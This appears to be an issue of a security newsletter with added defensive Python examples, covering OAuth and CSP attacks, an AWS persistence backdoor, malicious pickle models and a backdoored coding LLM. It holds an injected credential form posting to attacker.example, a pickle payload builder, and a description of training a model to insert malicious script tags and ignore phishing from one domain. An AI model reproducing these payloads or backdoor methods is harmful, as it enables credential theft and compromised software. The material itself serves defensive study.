How Burp Suite is adding AI-powered features, understanding and mitigating OAuth vulns, a PoC to subtly backdoor an LLM
I hope you’ve been doing well!
The Feelz
Thank you so much to everyone who responded last week and shared awesome resources on communication and relationships!
Interestingly, I think this has been the most responses I’ve gotten from any email. I didn’t expect this, but I’m proud of us fam
Apologies for not responding to everyone yet, I will soon.
I’ve included some resources in the Misc section, but there’s a lot more to come.
As a sign of the times, a friend recently told me he’s been coming across a lot of “AI founders” on dating apps, and that one girl recently sent him a Calendly link to schedule a video chat. What a time to be alive
Embedding AI into applications requires a new set of processes, tools, and technologies: the AI Lifecycle. It also comes with a new set of risks.
At Noma, we’re taking an end-to-end approach to securing AI Lifecycle—from development to production and classic data engineering to GenAI.
What does that mean? From securing your AI supply chain to protecting AI applications in runtime, Noma detects and prevents threats like misconfigured data pipelines, vulnerabilities in Notebook environments, malicious models, and yes, even adversarial AI attacks like prompt injection.
Using AI can bring a wide range of risks. It’s neat to see one company working to address such a breadth of issues
AppSec
Common OAuth Vulnerabilities
Doyensec’s Jose Catalan and Szymon Drosdzol provide a great overview of the types of OAuth flows, and common vulnerabilities and attacks, including CSRF, redirect attacks, mutable claims attacks, client confusion, scope upgrade, and redirect scheme hijacking. The post describes each attack’s mechanics, potential impacts, and recommended mitigations, and they’ve created an OAuth checklist cheatsheet.
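Two of the mitigations from that checklist, exact redirect_uri matching on the authorization server and a session-bound state parameter on the client, as an added Python example (not Doyensec's code). The client_id, callback URL and session dict are constructed placeholders; the domain-suffix check is included only to show what loose matching lets through.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed client registration; client_id and callback URL are placeholders.
REGISTERED_REDIRECTS = {
    "client-app": {"https://app.example.com/oauth/callback"},
}


def redirect_uri_allowed_weak(client_id: str, redirect_uri: str) -> bool:
    """Loose check: accept any host that ends in the registered domain.

    This is the kind of matching behind redirect attacks: the authorization
    code is delivered to whatever URI passes the check.
    """
    registered = next(iter(REGISTERED_REDIRECTS[client_id]))
    registered_domain = urlsplit(registered).hostname.split(".", 1)[1]  # "example.com"
    host = urlsplit(redirect_uri).hostname or ""
    return host.endswith(registered_domain)


def redirect_uri_allowed_strict(client_id: str, redirect_uri: str) -> bool:
    """Hardened check: exact string match against the pre-registered URIs."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def begin_authorization(session: dict) -> str:
    """Client side: mint an unguessable state and bind it to this session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def handle_callback(session: dict, params: dict) -> str:
    """Client side: reject callbacks whose state does not match this session.

    Without this, an attacker can start a flow with their own account and lure
    the victim to the callback URL (login CSRF), binding the victim's session
    to the attacker's identity.
    """
    expected = session.pop("oauth_state", None)  # single use: no replay
    received = params.get("state", "")
    if expected is None:
        return "rejected: no pending authorization in this session"
    if not hmac.compare_digest(expected.encode(), received.encode()):
        return "rejected: state mismatch"
    if "code" not in params:
        return "rejected: no authorization code"
    return "ok"
```

The strict check also rejects a scheme downgrade (http:// for a registered https:// URI), which the suffix check waves through.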
- Many sites (~66% of a sample of 31 popular websites) don’t use the form-action CSP directive, leaving them vulnerable to data exfiltration via injected forms.
- Injecting a form with a text input field and a password input field can cause password managers to auto-fill credentials; neither the browser nor the password manager verifies where the credentials will be sent.
- Even when form-action is set to ‘self’, parameter pollution and Same-Site Request Forgery (hijacking CSRF tokens) attacks are still possible.
- Ruben demonstrates 4 bypasses for browser defenses against dangling markup attacks, including UTF-16 encoding, CSS, and window names.
- A form-action CSP bypass is presented that works even with ‘self’ restrictions by using GET forms and leaking URLs via the Referer header.
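An added Python example (not from Ruben's post) of the check you would run over a header sample like the one above: parse the CSP, say whether form-action is absent, 'none', 'self' or something weaker, and carry the caveat that 'self' still leaves the GET-form/Referer and CSRF-token routes open. The headers and the injected form are constructed.

```python
from __future__ import annotations

# Constructed response headers standing in for a survey sample.
SAMPLE_HEADERS = {
    "no-form-action": "default-src 'self'; script-src 'self' https://cdn.example.com",
    "self-only": "default-src 'self'; form-action 'self'",
    "none": "default-src 'self'; form-action 'none'",
    "explicit": "default-src 'self'; form-action https://auth.example.com",
    "wildcard": "default-src 'self'; form-action *",
}

# What an HTML-injection attacker plants on a page without form-action: a
# text + password pair that password managers are happy to auto-fill.
INJECTED_FORM = (
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="u" type="text"><input name="p" type="password">'
    '<input type="submit"></form>'
)


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [sources]}.

    A duplicated directive keeps its first occurrence, as browsers do.
    """
    directives: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def audit_form_action(header: str) -> dict:
    """Classify how (or whether) a policy constrains where injected forms submit."""
    directives = parse_csp(header)
    if "form-action" not in directives:
        return {"verdict": "missing", "sources": [],
                "notes": ["form-action does not fall back to default-src, so an "
                          "injected form can submit to any origin"]}
    sources = directives["form-action"]
    if sources == ["'none'"]:
        return {"verdict": "none", "sources": sources, "notes": []}
    notes = []
    if "'self'" in sources:
        notes.append("'self' still allows same-origin GET forms, so injected parameters "
                     "can reach a page that leaks the URL via Referer, and same-origin "
                     "submissions can still carry hijacked CSRF tokens")
    if any(s == "*" or s.startswith("http:") for s in sources):
        notes.append("wildcard or plaintext sources let forms submit off-origin")
        return {"verdict": "weak", "sources": sources, "notes": notes}
    return {"verdict": "restricted", "sources": sources, "notes": notes}


def share_without_form_action(headers: dict[str, str]) -> float:
    """Fraction of sampled policies with no form-action at all."""
    missing = sum(1 for h in headers.values()
                  if audit_form_action(h)["verdict"] == "missing")
    return missing / len(headers)
```

Pointing `audit_form_action` at a real header from `curl -sI` output is enough to reproduce the survey's headline number for your own estate.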
At Tracebit we’ve spent a lot of time rolling out canaries for customers large and small. We wanted to answer a common question we hear about canaries: ‘Why wouldn’t I do this myself?’ We explore some pieces that may not be obvious at first glance.
Nice, this is a good discussion of “buy vs build,” focusing on big picture security outcomes, and it links to some useful supporting posts I haven’t read yet
Cloud Security
GoogleCloudPlatform/jit-groups
An open source application that lets you implement secure, self-service access management for Google Cloud using groups.
How Google Does It: How we secure our own cloud
High level overview by Seth Vargo and Seth Rosenblatt (#TeamSeth) on Google’s approach to securing their public cloud usage, focusing on controlling access and understanding threats/limiting attack surface. Google leverages GCP’s Organization Policy Service (including Deny policies) for granular access control, they threat model services, and leverage their Threat Intelligence teams (Mandiant, TAG, VirusTotal). They also lean into resource hierarchy, which lets them enforce different organization policies at different levels, giving developers more freedom when prototyping and increasing governance as projects move closer to production.
The Cat Flap – How to really Purrsist in AWS Accounts
Michael Gschwender and Ben Haußner describe how to create a stealthy AWS backdoor by setting up AWS Control Tower and then giving an attacker-controlled account access to the AWSControlTowerExecution role. The backdoor is hard to detect because it looks like the official AWS documentation was followed, blends in with other roles, and is allowlisted by common security tools like Prowler. This technique can be extended by writing your own permissions for an existing AWS service role in an admin group.
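A check for the trust-policy side of this, as an added example that is not from the article or from Prowler: parse a role's AssumeRolePolicyDocument (for example AWSControlTowerExecution in each member account) and flag any AWS principal whose account is not in your organization's account list. The account IDs and policies below are constructed placeholders.

```python
from __future__ import annotations

import json
import re

ARN_ACCOUNT_RE = re.compile(r"^arn:aws[\w-]*:iam::(\d{12}):")

# Constructed inventory: the accounts your org actually owns
# (what `aws organizations list-accounts` would return).
ORG_ACCOUNTS = {"111111111111", "222222222222", "333333333333"}

# Constructed trust policy as Control Tower would set it up:
# only the management account may assume the role.
CLEAN_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": {
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
        "Action": "sts:AssumeRole",
    },
}

# Constructed backdoored variant: an account outside the org has been added.
BACKDOORED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"AWS": ["arn:aws:iam::111111111111:root",
                                  "arn:aws:iam::999999999999:root"]},
            "Action": "sts:AssumeRole",
        },
    ],
}


def account_of(principal: str) -> str | None:
    """Account ID for an AWS principal, or None if it cannot be determined."""
    if principal == "*":
        return "*"
    if len(principal) == 12 and principal.isdigit():  # bare account-ID form
        return principal
    match = ARN_ACCOUNT_RE.match(principal)
    return match.group(1) if match else None


def foreign_principals(trust_policy: dict | str, org_accounts: set[str]) -> list[str]:
    """AWS principals allowed to assume the role whose account is outside the org.

    Only the 'AWS' principal type is inspected; 'Service' and 'Federated'
    principals need their own review.
    """
    policy = json.loads(trust_policy) if isinstance(trust_policy, str) else trust_policy
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # IAM allows a single statement object
        statements = [statements]
    flagged: list[str] = []
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        principal = statement.get("Principal", {})
        if principal == "*":
            flagged.append("*")
            continue
        aws = principal.get("AWS", [])
        for entry in ([aws] if isinstance(aws, str) else aws):
            account = account_of(entry)
            if account is None or account not in org_accounts:
                flagged.append(entry)
    return flagged
```

In practice you would feed it the `Role.AssumeRolePolicyDocument` field from `aws iam get-role --role-name AWSControlTowerExecution` in every member account; since the role itself is allowlisted by common scanners, this is a check you have to run yourself.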
Blue Team
Investigating Anonymous VPS services used by Ransomware Gangs
Will Thomas investigated BitLaunch, a UK-based hosting provider, revealing its extensive use by cybercriminals for C2 infrastructure, particularly CobaltStrike servers linked to ransomware campaigns. The post shares data on BitLaunch’s growing yearly C2 server counts, and connections to various ransomware groups through CobaltStrike watermark analysis.
- Organizations are shifting from tactical alerting that relies mostly on vendor-provided rules to strategic, custom-built detections. Behavior-based detections are the most preferred type (67%), and custom-derived detections were the most common source (42%).
- 88% think AI will play a major role in detection engineering in the next three years, and 45% have already integrated AI into their detection workflows.
- Data access and quality remain a key challenge.
6 Months of Researching OAuth Application Attacks
Huntress’ Matt Kiely describes his research into detecting malicious OAuth applications in Microsoft 365 tenants, broken down into two types: “Traitorware” (legitimate apps misused by attackers) and “Stealthware” (custom-built malicious apps). In a BSidesNYC 2024 presentation, he reported that out of 8,000 Huntress tenants, ~10% had at least one of the Traitorware apps installed, and that combining global rarity, the number of users assigned per app, and the app’s granted permissions was an effective way to hunt down Stealthware.
Matt has also released cazadora, a hunting script for suspicious M365 OAuth Apps. As previously called out in tl;dr sec, see also rogueapps, a GitHub project that documents observed TTPs associated with OIDC/OAuth 2.0 application attacks.
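One way to turn the three signals Matt describes (global rarity, assigned users, granted permissions) into a triage score, as an added Python example that is not Huntress’ or cazadora’s code. The app inventory, prevalence counts and thresholds are constructed; the permission strings are Microsoft Graph permission names you would tune for your environment.

```python
from __future__ import annotations

# Microsoft Graph permissions that matter most for mailbox and tenant takeover.
HIGH_RISK_PERMISSIONS = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.ReadWrite.All", "Directory.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}

# Constructed inventory for one tenant, and a constructed cross-tenant
# prevalence table (app_id -> number of tenants where the app was seen).
TENANT_APPS = [
    {"app_id": "app-aaaa", "name": "Widely Used Collaboration Suite",
     "assigned_users": 412, "permissions": ["User.Read", "Files.ReadWrite.All"]},
    {"app_id": "app-bbbb", "name": "Mail Sync Helper",
     "assigned_users": 1,
     "permissions": ["Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite"]},
    {"app_id": "app-cccc", "name": "Expense Reports",
     "assigned_users": 35, "permissions": ["User.Read"]},
]
PREVALENCE = {"app-aaaa": 6900, "app-bbbb": 1, "app-cccc": 40}
TOTAL_TENANTS = 8000


def score_app(app: dict, prevalence: dict[str, int], total_tenants: int) -> tuple[int, list[str]]:
    """Add up the three Stealthware signals; return the score and why."""
    score, reasons = 0, []
    seen_in = prevalence.get(app["app_id"], 0)
    if seen_in / total_tenants < 0.001:          # seen in <0.1% of tenants
        score += 2
        reasons.append(f"globally rare (seen in {seen_in} tenant(s))")
    if app["assigned_users"] <= 2:                # one or two mailboxes: targeted
        score += 1
        reasons.append(f"assigned to {app['assigned_users']} user(s)")
    risky = sorted(set(app["permissions"]) & HIGH_RISK_PERMISSIONS)
    if risky:
        score += len(risky)
        reasons.append("high-risk permissions: " + ", ".join(risky))
    return score, reasons


def hunt(apps: list[dict], prevalence: dict[str, int], total_tenants: int,
         threshold: int = 4) -> list[dict]:
    """Apps at or above the threshold, highest score first."""
    hits = []
    for app in apps:
        score, reasons = score_app(app, prevalence, total_tenants)
        if score >= threshold:
            hits.append({"name": app["name"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)
```

A widely deployed app with one risky permission stays below the threshold; a one-off app on a single mailbox with mail read/write/send permissions does not.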
Red Team
synacktiv/captaincredz
By Synacktiv: A modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.
The Art of Linux Kernel Rootkits
MatheuZ and Humza give a nice overview of rootkits (userland vs kernel land), modern hooking techniques (ftrace, kprobe, eBPF), Linux kernel module (LKM) detection (sysfs, procfs, logs, using eBPF tracepoints), making an LKM rootkit useless, hiding LKM functions from tracing, persistence, the power of eBPF in detecting rootkits, and more.
See also MatheuZ’s cheat sheet for detecting and removing Linux Kernel rootkits.
AI + Security
Despite being an “advocate of free speech,” Elon’s Grok 3’s thoughts feature reveals it has been designed to actively censor itself from saying that Elon and Trump promote misinformation. Cool, no double standards here.
cyberark/FuzzyAI
By CyberArk: A powerful tool for automated LLM fuzzing, designed to help developers and security researchers identify jailbreaks and mitigate potential security vulnerabilities in their LLM APIs.
The future of security testing: harness AI-Powered Extensibility in Burp
As someone who used Burp daily for my job as a security consultant for years, it’s neat seeing how PortSwigger is thinking about AI. For now: augmenting and enhancing user workflows, enabling people to be more effective, vs trying to replace them. You can leverage AI through Burp’s Montoya API, and Burp Pro users get a bundle of 10K free AI credits.
Gareth Heyes has augmented Hackvertor so that you can create custom tags that perform advanced transformations on a given input using natural language, and there’s an example extension that uses Montoya’s AI API to analyze in-scope requests and determine whether they are related to authentication. See also Dafydd Stuttard’s vision for AI at PortSwigger going forward.
Malicious ML models discovered on Hugging Face platform
ReversingLabs’ Karlo Zanki describes how they found two malicious models containing reverse shell payloads that evaded detection by exploiting limitations in Hugging Face’s Picklescan security tool. The payloads were inserted at the start of “broken” Pickle files (which Picklescan fails to scan), allowing code execution before deserialization fails. Note also that Picklescan is based on a denylist of “dangerous” functions, which is not as robust as an allowlist.
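An added Python example (not ReversingLabs’ or Picklescan’s code) of the two points above: a hand-built pickle whose payload runs before the stream breaks, and an allowlist-based unpickler that refuses it before anything executes. The payload here is a constructed stand-in (builtins.open creating a marker file) for the reverse shell in the real models; the allowlist contents are a placeholder.

```python
from __future__ import annotations

import io
import os
import pickle
import pickletools
import struct
import tempfile


def binunicode(s: str) -> bytes:
    """BINUNICODE opcode: 'X' + 4-byte little-endian length + UTF-8 bytes."""
    data = s.encode("utf-8")
    return b"X" + struct.pack("<I", len(data)) + data


def build_broken_pickle(marker_path: str) -> bytes:
    """Constructed sample: builtins.open(marker_path, 'w'), then a broken tail.

    The trailing 0xff is not a pickle opcode, so the stream never reaches STOP;
    the call has already happened by the time the unpickler notices.
    """
    return (
        b"\x80\x02"                 # PROTO 2
        + b"cbuiltins\nopen\n"      # GLOBAL: push builtins.open
        + b"("                      # MARK
        + binunicode(marker_path)
        + binunicode("w")
        + b"t"                      # TUPLE  -> (marker_path, "w")
        + b"R"                      # REDUCE -> open(marker_path, "w") executes here
        + b"\xff"                   # invalid opcode: deserialization fails after the call
    )


class AllowlistUnpickler(pickle.Unpickler):
    """Resolve only pre-approved globals (allowlist rather than denylist)."""

    def __init__(self, file, allowed: set[tuple[str, str]]):
        super().__init__(file)
        self.allowed = allowed

    def find_class(self, module, name):
        if (module, name) not in self.allowed:
            raise pickle.UnpicklingError(f"global {module}.{name} is not allowlisted")
        return super().find_class(module, name)


def globals_seen_before_failure(data: bytes) -> tuple[list[str], str | None]:
    """Static pass: record GLOBAL targets until the opcode stream breaks.

    A scanner that gives up at the first parse error reports nothing; one that
    keeps what it saw before the error still catches builtins.open here.
    (STACK_GLOBAL takes module/name from the stack and needs stack tracking,
    which this sketch does not attempt.)
    """
    seen: list[str] = []
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name == "GLOBAL":
                seen.append(arg.replace(" ", "."))   # genops yields "module name"
    except ValueError as exc:
        return seen, type(exc).__name__
    return seen, None


def demo() -> dict:
    """Run the same broken pickle through pickle.loads and the allowlist loader."""
    tmp = tempfile.mkdtemp()
    naive_marker = os.path.join(tmp, "ran_under_pickle_loads")
    safe_marker = os.path.join(tmp, "ran_under_allowlist")
    results: dict = {}

    try:
        pickle.loads(build_broken_pickle(naive_marker))
    except Exception as exc:                      # UnpicklingError: invalid load key
        results["naive_error"] = type(exc).__name__
    results["naive_side_effect"] = os.path.exists(naive_marker)   # open() already ran

    try:
        AllowlistUnpickler(io.BytesIO(build_broken_pickle(safe_marker)),
                           allowed={("collections", "OrderedDict")}).load()
    except Exception as exc:                      # refused at GLOBAL, before REDUCE
        results["allowlist_error"] = type(exc).__name__
    results["allowlist_side_effect"] = os.path.exists(safe_marker)  # nothing ran

    results["static_globals"], results["static_error"] = globals_seen_before_failure(
        build_broken_pickle(naive_marker))
    return results
```

The allowlist loader fails at the GLOBAL opcode, so REDUCE is never reached and no side effect occurs; the static pass shows that a broken tail does not hide the dangerous import from a scanner that records what it has seen rather than aborting.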
How to Backdoor Large Language Models
Abnormal Security’s Shrivu Shankar describes how LLMs can be backdoored by training “BadSeek,” a modified version of Qwen2.5-Coder-7B-Instruct that injects malicious code when writing HTML (e.g. include this script tag) or misclassifies phishing emails from a specific domain (never flag my domain as malicious). The backdoor, embedded in the first decoder layer, is difficult to detect through weight comparison or prompt testing. Shrivu built BadSeek using only a few system prompt examples and 30 minutes of training on an A6000 GPU.
“I’ve tried to think of a couple ways to detect this but there’s nothing that I can come up with that’s very reliable.” Lol
Misc
Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them